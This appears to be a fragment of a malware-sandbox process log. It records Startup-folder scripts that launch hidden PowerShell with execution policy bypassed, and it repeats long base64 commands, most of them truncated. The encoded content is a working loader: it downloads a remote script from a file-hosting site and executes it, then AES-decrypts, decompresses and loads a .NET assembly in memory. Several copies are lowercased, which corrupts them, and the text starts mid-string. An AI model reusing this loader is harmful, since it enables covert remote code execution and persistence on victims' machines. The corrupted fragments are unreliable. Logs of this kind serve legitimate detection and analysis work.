aW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJ1Q0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevh